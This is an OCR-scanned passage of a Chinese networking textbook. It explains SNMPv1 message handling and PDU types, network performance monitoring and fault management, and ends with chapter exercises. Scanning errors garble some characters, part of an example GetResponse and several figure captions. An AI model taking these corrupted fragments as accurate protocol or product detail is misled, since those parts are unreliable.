弃 该 报 文 ， 不 做 进一步 处 理 。 当 前 北 研 的 数据 通信 产品 只 支持 SNMP 版 本 1 。 

第 三 步 : 将 报 文中 的 团体 名 取出 ， 此 团体 名 由 发 出 请 求 的 网 管 站 填写 。 如 与 本 设备 认 
可 的 团体 名 不 符 ， 则 丢弃 该 报 文 ， 不 做 进一步 处 理 ， 同 时 产生 一 个 陷阱 报 文 。SNMPv1 只 
提供 了 较 弱 的 安全 措施 ， 在 版 本 3 中 这 一 功能 将 大 大 加 强 。 

第 四 步 : 从 通过 验证 的 ASN.1 对 象 中 提出 协议 数据 单元 PDU， 如 果 失 败 ， 丢 弃 报 
文 ， 不 做 进一步 处 理 。 否 则 处 理 PDU， 结 果 将 产生 一 个 报 文 ， 该 报 文 的 发 送 目的 地 址 应 
同 收 到 报 文 的 源 地 址 一 致 。 

根据 不 同 的 PDU，SNMP 协议 实体 将 做 不 同 的 处 理 。 

1) GetRequest PDU 

第 一 种 情况 : 如果 PDU 中 的 变量 名 在 本 地 维护 的 MIB 树 中 不 存在 ， 则 接收 到 这 个 
PDU 的 协议 实体 将 向 发 出 者 发 送 一 个 GetResponse 报 文 ， 其 中 的 PDU 与 源 PDU 只 有 一 点 
不 同 : 将 ERROR-STATUS 置 为 noSuchName. 并 在 ERROR-INDEX 中 指出 产生 该 变量 在 变 
量 LIST 中 的 位 置 。 

第 二 种 情况 : 如 果 本 地 协议 实体 将 产生 的 响应 报 文 的 长 度 大 于 本 地 长 度 限 制 ， 将 向 该 
PDU 的 发 出 者 发 送 一 个 GetResponse 报 文 ， 该 PDU 除了 ERROR-STATUS 置 为 tooBig， 
ERROR-INDEX 置 为 0 以 外 ， 与 源 PDU 相同 。 
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第 三 种 情况 : 如 果 本 地 协议 实体 因为 其 他 原因 不 能 产生 正确 的 响应 报 文 ， 将 向 该 
PDU 的 发 出 者 发 送 一 个 GetResponse 报 文 ， 该 PDU 除了 ERROR-STATUS 置 为 genErr， 
ERROR-INDEX 置 为 出 错 变量 在 变量 LIST 中 的 位 置 ， 其 余 与 源 PDU 相同 。 

第 四 种 情况 : 如 果 上 面 的 情况 都 没有 发 生 ， 则 本 地 协议 实体 向 该 PDU 的 发 出 者 发 送 
一 个 GetResponse 报 文 ， 该 PDU 中 将 包含 变量 名 和 相应 值 的 对 偶 表 ，ERROR-STATUS 为 
noError，ERROR-INDEX 为 0，request-id 域 的 值 应 与 收 到 PDU 的 request-id 相同 。 

2) GetNextRequest PDU 

GetNextRequest PDU 的 最 重要 的 功能 是 表 的 遍历 ， 这 种 操作 受到 了 前 面 所 说 的 管理 变 
量 的 表示 方法 的 支持 ， 从 而 可 以 访问 一 组 相关 的 变量 ， 就 好 像 它们 在 一 个 表 内 。 

下 面 通过 一 个 例子 解释 表 遍 历 的 过 程 。 


被 管 设备 维护 如 下 路 由 表 : 
Destination NextHop Metric 
10.0.0.99 89.1.1.42 5 
9.1.2.3 99.0.0.3 3 
10.0.0.51 89.1.1.42 5 


假设 NMS 想 要 获取 这 张 路 由 表 的 信息 ， 该 表 的 索引 就 是 目 的 网 络 地 址 。 
首先 NMS 向 被 管 设备 发 送 一 个 GetNextRequest PDU， 其 中 的 受 管 对 象 的 标识 如 下 : 


GetNextRequest ( ipRouteDest, ipRouteNextHop, ipRouteMetricl ) 


SNMP agent 响应 如 下 GetResponse PDU: 


GetResponse (( ipRouteDest.9.1.2.3 = "9.1.2.3" )， 
( ipRouteNextHop.9.1.2.3 90. 00.3 hs 
( ipRouteMetricl.9.1.2.3 外 


然后 ，NMS 将 继续 执行 以 下 命令 : 

GetNextRequest ( ipRouteDest.9.1.2.3, 
ipRouteNextHop.9.1.2.3, 

ipRouteMetricl.9.1.2.3 ) 


Agent 响应 过 程 : 
GetResponse (( ipRouteDest.10.0.0.51 = "10.0.0.51" )， 
( ipRouteNextHop.10.0.0.51 = "89.1.1.42" )， 
( ipRouteMetricl.10.0.0.51 = 5 )) 
Agent 必须 能 够 确定 下 一 个 管理 变量 名 ， 以 保证 所 有 变量 能 被 取 到 且 只 被 取 到 一 次 。 
同 理 ，NMS 继续 对 其 他 路 由 表 项 进行 同样 的 读 取 。 
3) GetResponse PDU 
GetResponse PDU 只 有 当 受 到 getRequest GetNextRequest SetRequest 才 由 协议 实体 产 
生 ，NMS 收 到 这 个 PDU 后 ， 应 显示 其 结果 。 
4) SetRequest PDU 
SetRequest PDU 除了 PDU 类 型 标识 以 外 ， 和 GetRequest 相同 ， 当 需要 对 被 管 变量 进 
行 写 操作 时 ，NMS 侧 的 协议 实体 将 生成 该 PDU。 对 SetRequest 的 响应 应 根据 下 面 的 情况 
分 别处 理 。 


DD 
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e@ ”如 果 是 关于 一 个 只 读 变 量 的 设置 请 求 ， 则 收 到 该 PDU 的 协议 实体 产生 一 个 
GetReponse 报 文 ， 并 置 error status 为 noSuchName, error index 的 值 是 错误 变量 在 
变量 list 中 的 位 置 。 

@ ”如 果 被 管 设备 上 的 协议 实体 收 到 的 PDU 中 的 变量 对 偶 中 的 值 ， 类 型 、 长 度 不 符 
合 要 求 ， 则 收 到 该 PDU 的 协议 实体 产生 一 个 GetReponse 报 文 ， 并 置 error status 
为 badValue，error index 的 值 是 错误 变量 在 变量 list 中 的 位 置 。 

@ ”如 果 需 要 产生 的 GetReponse 报 文 长 度 超过 了 本 地 限制 ， 则 收 到 该 PDU 的 协议 实 
体 产 生 一 个 GetReponse 报 文 ， 并 置 error status 为 tooBig，error index 的 值 是 0。 

@ ”如 果 是 其 他 原因 导致 SET 失败 ， 则 收 到 该 PDU 的 协议 实体 产生 一 个 GetReponse 
报 文 ， 并 置 error status 为 genErr, error index 的 值 是 错误 变量 在 变量 list 中 的 
位 置 。 

e@ ”如 果 不 符合 上 面 任何 情况 ， 则 agent 将 把 管理 变量 设置 收 到 的 PDU 中 的 相应 
值 ， 这 往往 可 以 改变 被 管 设备 的 运行 状态 。 同 时 产生 一 个 GetResponse PDU,， 其 
中 error status 置 为 noError，error index 的 值 为 0。 


5) Trap PDU 

Trap 0 NMS 发 送 的 消息 。NMS 收 到 trap PDU 后 要 
将 起 变量 对 偶 表 中 的 内 容 显示 出 来 。 一 些 常用 的 trap 类 型 有 冷 、 热 启动 ， 链 路 状态 发 生变 
化 等 。 


有 关 SNMP 协议 的 详细 文档 有 RFC1157、RFC1902、RFC2273 和 RFC2274 等 ， 如 果 
读者 对 SNMP 协议 感 兴趣 ， 可 进一步 阅读 以 上 文档 。 


10.4 网 络 性 能 管理 


卫 网 络 性 能 管理 主要 涉及 到 网 络 性 能 参数 的 测量 和 监控 ， 服 务 质量 保障 机 制 和 性 能 评 
价 体系 ， 其 中 网 络 性 能 的 监测 是 网 络 性 能 管理 中 的 基础 和 主要 内 容 。 本 节 我 们 将 重点 介绍 
对 网 络 性 能 的 监测 。 


1. 网 络 性 能 管理 和 监测 的 意义 


对 PP 网 络 进行 性 能 监测 和 管理 ， 有 以 下 几 点 重要 意义 。 

1) ”实时 监测 网 络 状况 

实时 获取 网 络 的 当前 运行 状况 ， 及 时 在 网 络 出 现 故 障 或 拥塞 前 发 出 警告 ， 预 测 网 络 可 
能 出 现 的 瓶颈 及 原因 ， 减 轻 运 维 人 员 的 工作 负担 。 

2) ”有 利于 网 络 的 合理 规划 

通过 对 网 络 性 能 和 流量 状态 的 监视 、 数 据 采 集 和 分 析 ， 提 供 详细 的 链 路 和 节点 流量 分 
析 报 告 ， 获 得 网 络 流量 分 布 和 流向 分 布 、 报 文 特性 和 协议 分 布 特性 ， 可 为 网 络 规划 、 路 由 
策略 、 资 源 和 容量 升级 提供 数据 依据 。 

3) ”提供 网 络 增值 业务 

网 络 性 能 管理 中 很 重要 的 一 项 任务 是 对 业务 占用 带宽 的 分 布 、 业 务 会 话 量 进行 统计 和 
分 析 ， 以 便 了 解 和 分 析 网 络 存在 的 特性 和 所 属 用 户 的 使 用 偏好 ， 从 而 进一步 引导 新 的 网 络 
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应 用 和 业务 平台 的 开发 和 规划 ， 进 行 增值 业务 的 拓展 和 市 场 宣 传 。 

4) “提供 对 资费 标准 的 数据 支撑 

通过 对 用 户 上 网 时 长 、 上 网 流量 以 及 上 网 行为 特征 的 数据 分 析 ， 为 实现 基于 时 间 段 、 
带宽 、 应 用 、 服 务 质量 等 更 加 灵活 的 资费 标准 的 制定 提供 数据 依据 和 支撑 。 

当前 ， 对 网 络 性 能 的 监测 和 管理 技术 已 经 用 于 互联 网 运营 商 、 电 信 运 营 商 以 及 拥有 下 
专用 网 络 的 各 种 企业 中 ， 对 于 分 析 、 确 定 现 有 IP 网 络 存在 的 潜在 问题 ， 评 价 和 比较 网 络 
改造 方案 ， 优 化 网 络 性 能 等 方面 都 有 很 大 帮助 。 


2. 网 络 性 能 的 主要 管理 和 监测 对 象 


根据 中 国 通信 标准 化 协会 已 完成 的 《IP 网 络 技术 要 求 一 一 性 能 参数 与 指标 》 的 有 关 规 
定 ，IP 网 络 性 能 参数 指标 主要 包括 以 下 几 个 。 

1) ”可 用 性 

通常 一 个 网 络 的 可 用 性 取决 于 该 网 络 的 类 型 和 用 途 ， 如 果 一 个 端 到 端 IP 网 络 业务 的 
包 丢 失 率 低 于 一 定 的 门限 值 ， 则 认为 该 端 到 端 IP 网 络 业务 是 可 用 的 ， 否 则 就 是 不 可 用 
的 。 根 据 可 用 性 的 定义 ， 我 们 可 以 把 人 P 网 络 业务 的 全 部 持续 时 间 分 为 可 用 时 间 和 不 可 用 
时 间 。 

2) ”传输 时 延 

包 传 输 时 延 通常 定义 为 当 IP 包 穿 过 一 个 或 多 个 网 络 段 时 ， 所 经 历 的 时 间 ( 不 考虑 传送 
成 功 与 否 )。 

3)” 包 丢失 率 

包 丢 失 率 通常 是 指 丢 失 的 人 P 包 数量 与 所 有 发 送 的 全 包 的 比值 。 

4) ”时 延 拌 动 

当 JP 包 被 连续 传递 时 ， 包 与 包 之 间 的 传输 时 延 的 间隔 变化 率 。 时 延 拌 动 对 于 某 些 应 
用 ， 如 视频 业务 ， 影 响 显 著 。 

5)” 包 误差 率 

通常 是 指 错误 IP 包 传送 数量 与 成 功 IP 包 传送 数量 加 上 错误 IP 包 传送 之 和 的 一 个 
比值 。 

6) ”虚假 下 包 率 

通常 是 指 在 一 个 特定 时 间 间 隔 内 ， 对 于 某 个 测量 点 上 观测 到 的 虚假 IP 包 数 量 除 以 该 
时 间 的 间隔 。 

除了 上 述 与 网 络 性 能 直接 相关 的 参数 以 外 ， 其 他 一 些 与 网 络 设备 有 关 的 参数 对 于 人 ?P 
网 络 的 性 能 也 有 显著 的 影响 ， 例 如 服务 器 的 处 理 器 的 利用 率 、 内 存 剩 余 空 间 、 温 度 、 电 
压 、 开 机 时 间 、 系 统 版 本 、 缓 冲 区 故障 计数 、 缓 冲 区 遗失 计数 以 及 其 他 性 能 指标 。 

在 进行 网 络 监测 和 评估 时 ， 仅 仅 取 得 上 述 监测 对 象 的 值 往往 是 不 够 的 ， 应 综合 上 述 对 
象 的 监测 数据 进行 综合 分 析 ， 进 而 获取 以 下 规律 性 的 网 络 特性 : 

@ ”网 络 线路 利用 率 和 趋势 、 流 量 分 布 、 流 量 走向 。 

e@ ”网 络 区 域 间 的 流量 模式 ， 即 以 网 络 拓扑 为 依据 划分 被 测 流量 ,， 出 网 络 规 划 和 运 

维 的 目的 。 
@ ”网 络 用 户 的 流量 模式 ， 即 测量 用 户 或 用 户 群 的 流量 特征 ， 突 出 用 户 管理 和 客户 服 
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务 的 目的 ， 也 是 用 户 SLA 保证 的 基础 。 
e@ ”网 络 业务 的 流量 模式 ， 测 量 网 络 中 指定 业务 的 流量 模式 和 质量 ， 突 出 网 络 的 业务 
规划 和 运营 的 目的 。 


3. 网 络 性 能 监测 的 关键 技术 


涉及 IP 网 络 性 能 的 监测 技术 有 很 多 ， 下 面 着 重 对 其 中 几 项 关键 技术 进行 一 个 简单 的 
介绍 。 

1) ”网 络 性 能 参数 的 采集 方法 

通常 情况 下 ， 网 络 管理 人 员 只 对 几 个 重要 的 网 络 环节 进行 QoS 监测 。 因 此 可 考虑 通 
过 以 下 三 种 方式 来 实现 对 重要 环节 网 络 性 能 的 监测 。 

e@ ”使 用 现 有 路 由 器 或 交换 机 自身 具备 的 流量 测量 功能 。 

e@ 在 设备 上 采用 专用 的 嵌入 式 卡 实现 对 重点 链 路 的 监控 。 

e ”在 IP 传 输 链 路 中 串 入 或 并 入 流量 分 析 设 备 来 获得 流量 信息 。 

其 中 第 一 种 方式 通常 利用 路 由 器 或 交换 机 自身 携带 的 NetFlow 协议 来 实现 。 在 这 种 方 
式 下 ， 大 流量 的 数据 采集 会 影响 设备 的 CPU 和 存储 资源 利用 率 ， 因 此 一 般 采用 抽样 技 
术 ， 其 观测 粒度 较 粗 。 而 且 由 于 目前 的 标准 尚 不 完善 ， 另 外 由 于 高 速 接口 的 流量 监测 设备 
成 本 相对 较 高 ， 需 要 在 网 络 设备 中 或 在 网 络 中 添加 专用 的 数据 采集 设备 ， 因 此 IPFIX 技术 
方案 仍 处 于 讨论 阶段 。 

后 两 种 监测 机 制 可 以 获得 网 络 的 状态 信息 ， 为 了 提高 网 络 的 性 能 ， 应 将 这 种 状态 信息 
作为 路 由 策略 选择 时 考虑 的 重要 参数 ， 以 便 在 感知 到 网 络 阻塞 发 生 或 将 要 发 生 时 能 够 实时 
地 改变 网 络 路 由 。 目 前 ， 这 方面 的 研究 已 经 在 IETF 展开 ， 也 提出 了 一 些 基 于 QoS 的 路 由 
算法 ， 但 是 支持 这 些 新 型 路 由 协议 的 网 络 设 备 并 不 多 。 另 一 方面 ， 这 些 网 络 状态 信息 可 以 
为 网 络 管理 人 员 对 网 络 运行 状况 进行 预测 和 把 握 提供 事实 依据 ， 从 而 可 以 非 实时 地 对 网 络 
进行 调整 ， 以 提升 网 络 性 能 。 

2) ”网 络 性 能 测量 点 的 部 署 和 管理 

在 网 络 中 配置 多 个 网 络 性 能 探测 器 ， 通 过 分 布 式 测试 和 集中 式 分 析 模 式 ， 为 多 个 用 户 
的 多 种 性 能 监测 服务 ， 通 过 研究 网 络 性 能 监测 域 的 逻辑 划分 和 管理 方法 ， 不 仅 能 够 降低 建 
设 成 本 ， 还 能 真正 开展 面向 更 多 用 户 的 网 络 性 能 监测 服务 。 研 究 网 络 性 能 监测 域 的 灵活 的 
逻辑 划分 和 管理 方法 。 

3) ”网 络 性 能 的 采样 测量 技术 

考虑 到 负载 的 问题 ， 通 常 进行 长 时 间 的 连续 监测 方案 并 不 是 最 好 的 方案 ， 而 是 要 采用 
适当 的 采样 技术 ， 即 在 时 间 轴 上 依据 一 定 的 算法 ， 抽 取 部 分 测量 时 间 点 ， 并 对 关心 的 参数 
进行 测量 和 记录 。 采 样 技术 可 以 直接 降低 探测 器 的 工作 量 ， 减 轻 网 络 中 的 负载 ， 减 少 网 络 
设备 的 压力 ， 进 而 可 以 降低 对 探测 器 的 技术 要 求 ， 降 低产 品 成 本 。 在 时 间 轴 上 选取 采样 时 
间 点 的 算法 很 多 ， 主 要 包括 以 下 两 种 : 

e@ 固定 时 间 间 隔 周期 性 采集 数据 ， 在 处 理 过 程 中 依据 一 定 的 线性 预测 算法 进行 建 

模 ， 使 点 数据 延展 为 连续 数据 。 
e@ 。 自 适 应 时 间 间 隔 采集 数据 ， 在 处 理 中 依据 一 定 的 非 线性 预测 算法 ， 如 神经 元 网 络 
的 方式 将 点 数据 延展 为 连续 数据 。 
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相对 于 固定 时 间 间 隔 周期 性 采集 数据 算法 ， 自 适应 的 时 间 间 隔 算法 可 以 在 一 定 程度 上 
增加 对 网 络 流量 突 发 事件 的 发 现 概率 ， 即 在 流量 变化 较为 频繁 或 剧烈 的 时 间 段 加 大 采集 密 
度 ， 在 流量 较为 平缓 的 时 间 段 降低 采集 密度 。 


10.5 网络 故障 管理 


网 络 故 障 管理 是 网 络 管理 中 最 基本 的 内 容 和 任务 之 一 ， 故 障 管理 的 目的 在 于 确保 网 络 
的 可 靠 性 和 稳定 性 。 当 网 络 发 生 故 障 时 ， 相 应 的 故障 管理 系统 和 措施 应 能 及 时 发 现 故障 定 
位 、 可 能 造成 故障 的 原因 和 一 些 故 障 解决 方案 。 网 络 故 障 管理 的 日 常 工作 包含 对 网 络 节点 
的 状态 监测 、 故 障 记 录 的 追踪 与 检查 ， 以 及 平时 的 运 维 数据 管理 。 
故障 管理 以 监视 网 络 设备 和 网 络 链 路 的 工作 状况 为 基础 ， 包 括 对 网 络 设备 状态 和 报警 
数据 的 采集 、 存 储 ， 从 而 实现 报警 信息 的 通知 、 故 障 定位 、 信 息 过 滤 、 报 警 显示 、 报 警 统 
计 等 功能 。 故 障 管理 还 应 该 可 以 统一 不 同 网 络 设备 的 报警 信息 格式 ， 并 将 其 显示 在 图 形 界 
面 上 ， 通 过 对 报警 信息 进行 相关 性 处 理 ， 确 定 报警 发 生地 的 管理 归属 等 ， 除 此 之 外 ， 故 障 
管理 还 应 根据 用 户 需要 保存 所 有 报警 信息 ， 并 产生 各 种 故障 统计 和 分 析 报告 。 
网 络 故 障 管理 通常 包括 故障 检测 、 隔 离 和 纠正 三 个 方面 ， 主 要 包括 以 下 内 容 。 
1) ”网 络 维护 和 错误 日 志 的 检查 
@ ”运用 网 络 监测 技术 ， 监 测 网 络 的 整体 运行 情况 。 
e@ ”根据 运 维 等 级 的 重要 性 ， 对 重点 网 络 环境 进行 状态 的 重点 监视 。 
@ 自动 检查 网 络 设备 的 错误 日 志 ， 分 析 错 误 原 因 。 
2) “网 络 故障 报告 
@ ”可 自 定义 多 种 报警 方式 提示 网 络 故障 的 发 生 ， 通 常 可 使 用 包括 颜色 、 声 音 、 日 
志 、 触 发 机 制 等 多 种 显示 手段 。 
@ ”网 络 故障 发 生 时 可 自动 报警 ， 并 具有 自动 通知 的 功能 ， 报 警方 式 可 采用 邮件 、 短 
信 等 多 种 方式 。 
@ ”可 以 根据 网 络 故障 的 危害 程度 将 报警 指示 进行 分 级 管理 ， 并 要 求 系统 根据 故障 级 
别 做 出 不 同 的 反应 。 
3) ”跟踪 、 定 位 和 分 析 故 障 
@ ”使 用 各 种 故障 诊断 工具 ， 分 析 故 障 性 质 。 
进行 故障 追踪 定位 ， 确 认 故 障 类 型 及 性 质 。 
分 析 设 备 故障 情况 ， 制 定 排 错 方案 。 
启用 备用 线路 或 设备 ， 进 行 故障 隔离 。 
4) “错误 纠正 
根据 故障 分 析 结 果 ， 制 定 并 实施 故障 解决 方案 。 
根据 故障 原因 ， 完 善 网 络 规划 和 配置 ， 防 止 此 类 故障 的 再 次 发 生 。 对 于 目前 的 网 
络 管理 系统 ， 这 个 任务 还 需 网 络 管理 员 自身 去 完成 。 
5) ”故障 分 析 预 测 
@ ”通过 建立 故障 报警 数据 库 ， 对 历史 故障 警报 和 性 能 监测 资料 进行 统计 分 析 ， 寻 找 
网 络 故 障 和 异常 情况 发 生 的 规律 。 
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e@ ”基于 大 量 的 事实 统计 分 析 ， 判 断 网 络 故障 的 常见 类 型 及 发 作 频率 ， 预 测 未 来 网 络 
故障 的 发 作 趋势 ， 以 便 积极 地 预防 灾难 性 网 络 故障 的 发 生 。 
网 络 故 障 管理 的 效率 目前 仍 主要 依靠 网 管 员 的 丰富 经 验 和 技术 水 平 ， 一 般 情况 下 ， 网 
络 管理 员 应 根据 有 关 信息 对 报警 进行 处 理 、 排 除 故障 ; 当 故 障 比较 复杂 时 ， 网 络 管理 员 应 
执行 一 些 诊断 测试 来 辨别 故障 原因 。 同 时 ， 对 网 络 故障 管理 的 自动 化 和 智能 化 研究 是 当前 
网 络 管理 系统 发 展 的 一 个 热点 问题 ， 并 与 数据 挖掘 、 专 家 库 、 知 识 工程 等 领域 的 研究 交叉 
进行 。 


10.6 本 章 小 结 


本 章 主要 对 网 络 管理 中 的 一 些 基本 知识 和 原理 进行 了 简单 的 介绍 ， 通 过 学 习 网 络 管理 
系统 的 相关 模型 和 功能 参考 ， 帮 助 读者 了 解 网 络 管理 的 需求 和 应 用 定位 。 第 二 部 分 内 容 着 
重 介绍 了 网 络 管理 的 相关 协议 ， 尤 其 是 SNMP 协议 是 本 章 的 重点 和 难点 ， 掌 握 SNMP 协 
议 是 每 个 网 管 员 必 备 的 知识 之 一 ， 也 是 网 络 管理 系统 的 技术 基础 。 在 本 章 的 最 后 ， 我 们 通 
过 对 网 络 性 能 管理 和 故障 管理 的 简单 介绍 ， 帮 助 读者 从 网 络 管理 系统 的 产品 角度 认识 了 网 
络 管理 的 功能 需求 和 应 用 重点 ， 从 而 加 深 读 者 对 网 络 管理 的 认识 。 


10.7 课 后 习题 


1. 填空 题 


(1) 国际 标准 化 组 织 对 网 络 管理 定义 了 五 大 通用 功能 包括 故障 管理 、 、 配 
置 管理 、 和 计 费 管理 。 

(2) 现代 网 络 高 速 发 展 和 技术 革新 的 前 提 条 件 是 网 络 要 尽 可 能 地 兼容 各 种 类 型 的 协 
议 、 、 业 务 和 

(3) 网 络 基础 设施 主要 包括 骨干 网 络 、 、 接 入 网 络 、 外 部 网 络 连 接 和 网 络 
管理 四 大 组 成 部 分 。 

(4) 目前 主流 的 VPN 技术 分 为 三 种 IPSecVPN、SSL VPN 和 

(5) 一 个 SNMP 数据 报 结构 一 般 由 以 下 三 个 部 分 组 成 : 版 本 识别 符 、 
协议 数据 单元 (PDU)。 


2. 选择 题 
(1) 网 络 管理 的 基本 任务 是 状态 监测 、 数 据 收集 和 分 析 、( ” )。 

A. 状态 测试 B. 状态 分 析 C. 数据 采集 D. 数据 状态 控制 
(2) 七 层 协 议 标准 制定 的 ， 其 主要 成 果 是 ( 。 ) 和 CMIP。 

A. RMON B. CMIS C. WEB D. CMIT 


(3) 目前 可 用 的 安全 模型 有 SNMPv1、( ”) 和 SNMPv3 这 三 种 类 别 。 
A. SNMPv2C B. SNMPv2 C. SNMPv2B D. SNMPv2D 
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(4) SNMP 协议 的 5 种 基本 操作 类 型 : get-request、get-next-request、set-request、 


( )、trap。 
A. set-next-request  B.set-response CC.get-response  D. trap-response 


3. 判断 题 
(1) 网 络 的 性 能 、 作 用 及 其 影响 力 等 因素 是 决定 网 络 对 可 靠 性 要 求 高 低 的 决定 性 


因素 。 六 
(2) 管理 骨干 网 络 时 需要 重点 考虑 两 个 方面 的 问题 一 是 数据 转发 性 能 ; 二 是 骨干 网 络 

的 可 靠 性 。 《 二 
(3) 在 网 络 管理 功能 参考 模型 中 ，FSAPS 模型 和 OAM&P 模型 是 占据 最 主导 地 位 的 

两 种 参考 模型 。 | 
(4) SNMP 协议 通常 采用 两 种 收集 数据 的 方法 : 一 种 是 轮 询 (Polling-Only) 法 ， 另 一 种 

是 基于 中 断 (Interrupt-Based) 的 方法 。 KE 
4. 简 答题 


(1) 网 络 管理 的 基本 目标 是 什么 ? 

(2) 简 述 OAM&P 模型 中 各 个 类 别 涉及 的 管理 功能 。 

(3) 网 络 管理 保障 网 络 系 统 中 的 数据 安全 ， 常 用 的 方法 有 哪些 ? 
(4) SNMP 应 用 协议 的 运行 过 程 是 什么 ? 

(5) 网 络 性 能 监测 的 关键 技术 是 什么 ? 
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网 络 管理 系统 是 一 种 以 软件 为 主 、 软 硬结 合 的 网 络 管理 应 用 系 
统 ， 其 功能 一 般 分 为 性 能 管理 、 配 置 管理 、 安 全 管理 、 计 费 管理 、 
故障 管理 五 大 管理 功能 。 传 统 网 络 管理 系统 的 管理 对 象 通常 仅 包括 
路 由 器 、 交 换 机 等 网 络 通信 设备 。 随 着 网 络 规模 和 应 用 规模 的 日 益 
扩大 ， 当 前 网 络 管理 系统 大 多 都 将 服务 器 性 能 、 应 用 性 能 和 数据 库 
等 包含 在 其 管理 对 象 的 范畴 内 ， 几 竹 包 合 了 了 同 络 ce 
象 ， 从 而 给 系统 管理 员 提 供 了 一 个 全 面 系 统 的 网 
将 主要 介绍 网 络 管理 系统 的 一 些 基 础 知识 和 基本 
介绍 一 些 典 型 的 网 络 管理 产品 。 
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11.1 网 络 管理 系统 概述 


目前 大 型 IT 设施 的 正常 运营 和 赢利 都 需要 数 以 百 计 的 系统 、 应 用 程序 、 服 务 等 发 挥 
出 最 佳 性 能 ， 然 而 随 着 IT 环境 变 得 越 来 越 复杂 ， 其 成 本 和 潜在 的 危险 也 随 之 迅速 攀升 。 
为 了 从 业务 的 角度 管理 所 有 IT 元 素 和 服务 ， 并 及 时 了 解 和 预测 技术 变化 对 业务 的 影响 ， 
目前 大 多 数 网 管 厂 商 已 不 再 局 限于 传统 的 网 管 软件 ， 而 是 向 着 综合 业务 管理 的 方向 发 展 。 


11.1.1 网络 管理 系统 的 功能 和 分 类 


国际 标准 化 组 织 对 网 络 管理 定义 了 五 大 通用 功能 :故障 管理 、 配 置 管理 、 性 能 管理 、 
安全 管理 和 计 费 管理 ， 与 此 对 应 ， 一 般 的 网 络 管理 软件 产品 也 具有 这 样 五 项 基本 功能 ， 即 
故障 管理 模块 、 配 置 管 理 模块 、 性 能 管理 模块 、 安 全 管理 模块 以 及 计 费 管理 模块 ， 下 面 就 
对 这 五 大 基本 功能 进行 一 下 简单 的 介绍 。 


1. 故障 管理 模块 


故障 管理 是 所 有 网 络 管理 任务 中 最 基本 的 功能 之 一 ， 当 网 络 中 某 个 节点 或 链 路 失效 
时 ， 网 络 管理 系统 必须 能 够 迅速 发 现 并 利于 查找 到 该 故障 ， 从 而 进一步 排除 该 故障 。 由 于 
产生 网 络 故障 的 原因 一 般 是 比较 复杂 的 ， 而 且 有 时 通常 是 由 几 个 因素 互相 作用 造成 ， 因 此 
通常 情况 下 首先 应 进行 故障 检测 ， 然 后 再 进行 故障 隔离 和 故障 纠正 。 事 后 应 对 故障 原因 进 
行 深入 分 析 ， 以 防止 类 似 故 障 再 次 发 生 。 因 此 故障 管理 模块 应 充分 包含 以 下 典型 功能 。 

1) ”故障 监测 功能 

故障 管理 模块 应 能 主动 探测 或 被 动 接收 网 络 上 的 各 种 事件 信息 ， 并 识别 出 其 中 与 网 络 
和 系统 故障 相关 的 内 容 ， 具 有 对 其 中 关键 信息 保持 跟踪 、 生 成 事件 记录 的 能 力 ， 如 图 11-1 
所 示 。 


所 二 四 占 检 者 册 基 和 (5 玉 尖 理 吗 。 闪 QD 关 M 
ESKOIE EC 1 


| 和 | 起 出 庆 要 【你 ENNFTRAR | 起 天 
有 [3 ES 


二 
2 语音 无 右 应 


图 11-1 故障 监测 界面 示意 图 
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2) ”故障 报警 功能 

故障 管理 模块 接收 到 故障 监测 传 来 的 报警 信息 后 ， 应 能 选择 相应 的 报警 策略 驱动 报警 
程序 ， 如 图 11-2 所 示 ， 并 可 根据 故障 级 别 采 用 不 同 的 方式 予以 报警 ， 例 如 通过 窗口 提 
示 、 声 音 / 振 铃 、 电 子 邮件 、 手 机 短信 等 方式 将 故障 信息 通知 管理 员 ， 如 图 11-3 所 示 。 


Ts : 
/名 了 网 1%33 基 | 者 拓 站 | 上 服 和 器 | A 报 区 | lr | ON|O EE 
接收 Email 帐 号 1 
接收 Email 帐 号 2 
发 送 SMTP 服 务 器 
发 送 Email 帐 号 
发 送 Email 帐 号 密码 


接收 短信 手机 号 码 


短信 猪 序列 号 


声音 报警 


Arp 警 示 贱 值 ( 个 ) 


区 [本 


11-2 ”报警 方式 设 定 对 话 杠 


URL 监 列 本 置身 导 
监 刑 时 间 间隔 
请 输入 监 刑 898 间 间 蚂 
ES 2 
请 输入 服务 异常 后 的 监 列 时 间 间隔 
每 | ”10 同 内 钟 二 监 则 -次 


监 现时 间 过 小 
加 在 下 列 时 间 段 才 监 测 
Er 同 四 
口 全 选 
回 星期 日 加 星期 一 加 星期 二 回 星期 三 四 星期 四 [加 星 期 五 四 星期 六 


连续 1 上 次 异常 后 友 出 告警 


当 服 务 异常 时 的 告警 等 级 为 


区 淹 


图 11-3 ”监控 报警 级 别 策略 检测 
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3) ”故障 信息 管理 功能 

网 络 管理 系统 应 具有 根据 事件 记录 进行 相应 分 析 的 能 力 ， 并 生成 相应 的 日 志 记录 ， 将 
事件 、 故 障 和 日 志 构 成 逻辑 上 相互 关联 的 整体 ， 以 反映 故障 产生 、 隔 离 和 排除 等 一 系列 的 
动态 过 程 。 

4) “ 排 错 支持 工具 

网 络 管理 系统 一 般 都 具有 多 种 网 络 故障 排 错 工具 ， 通 过 向 管理 员 提 供 一 系列 的 实用 工 
具 ， 帮 助 管理 员 及 时 了 解 被 控 设备 的 状况 ， 并 能 对 被 控 设备 进行 分 析 测试 ， 并 记录 下 测试 
结果 以 便 供 技术 人 员 分 析 和 排 错 ， 好 的 网 络 管理 系统 还 能 根据 已 有 的 故障 知识 库 和 用 户 原 
有 的 排 错 经 验 为 管理 员 提供 故障 处 理 和 测试 的 行动 导航 。 

5) ”检索 和 分 析 故 障 信息 

为 方便 管理 员 查 询 原 有 故障 信息 及 设备 运行 情况 ， 网 络 管理 系统 一 般 都 具有 故障 信息 
检索 功能 ， 管 理 员 可 以 根据 关键 字 检索 来 查询 系统 中 记录 的 各 类 事件 信息 和 日 志 信息 ， 并 
定期 收集 故障 记录 数据 ， 在 此 基础 上 为 被 控 设备 和 线路 提供 可 靠 性 分 析 ， 已 提示 设备 的 历 
史 运 行 状态 。 


2. 配置 管理 模块 


配置 管理 在 网 络 管理 系统 中 非常 重要 ， 它 往往 用 于 初始 化 网 络 和 配置 网 络 ， 以 使 其 提 
供 正常 的 网 络 服务 。 配 置 管理 一 般 是 通过 辨别 、 定 义 、 控 制 和 监测 等 方式 对 一 组 网 络 对 象 
进行 相应 的 处 理 ， 以 实现 对 某 个 特定 功能 的 配置 或 者 实现 网 络 性 能 的 优化 。 配 置 管理 模块 
一 般 具 有 以 下 典型 功能 。 

1) ”自动 获取 能 力 

